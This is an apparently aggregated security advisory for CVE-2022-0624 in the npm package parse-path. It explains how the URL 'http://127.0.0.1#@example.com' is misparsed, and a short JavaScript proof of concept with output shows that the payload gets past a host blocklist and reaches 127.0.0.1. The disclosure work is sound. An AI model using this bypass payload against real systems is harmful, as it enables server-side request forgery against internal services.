Lucene search
R0hanshAFFFB2BD-FB06-4144-829E-ECBBCBC85388HistoryFeb 14, 2022 - 7:05 p.m.
in ionicabizau/parse-path
2022-02-1419:05:50
r0hansh
www.huntr.dev
13
0.001 Low
EPSS
Percentile
38.1%
Description
parse-path is unable to detect the right resource. While parsing http://127.0.0.1#@example.com url, parse-path thinks that the host/resource is example.com, however the actual resource is 127.0.0.1.
Proof of Concept
SSRF PoC
const parsePath = require("parse-path");
const axios = require('axios');
var PAYLOAD = "http://127.0.0.1#@example.com";
parsedData = parsePath(PAYLOAD);
// Blacklist few domains
if (parsedData.resource !== '127.0.0.1') {
console.log("BYPASSED...");
axios.get(PAYLOAD).then(function (resp) {
console.log("Sent the request to " + resp.request._currentUrl);
})
.catch(function (error) {
console.log("Sent the request to " + error.request._currentUrl);
});
}
OUTPUT:
BYPASSED...
Sent the request to http://127.0.0.1/
Impact
An attacker can bypass the host-validation checks which can lead to SSRF, open redirect and other similar vulnerabilities. The above PoC bypass SSRF checks as axios will load 127.0.0.1 rather than example.com
Related
veracode
veracode
Authorization Bypass
2022-06-29 15:24:19
prion
prion
Authorization
2022-06-28 09:15:00
osv
osv
Authorization Bypass in parse-path
2022-06-29 00:00:57
CVE-2022-0624
2022-06-28 09:15:08
cvelist
cvelist
nvd
nvd
CVE-2022-0624
2022-06-28 09:15:08
cve
cve
CVE-2022-0624
2022-06-28 09:15:08
github
github
Authorization Bypass in parse-path
2022-06-29 00:00:57
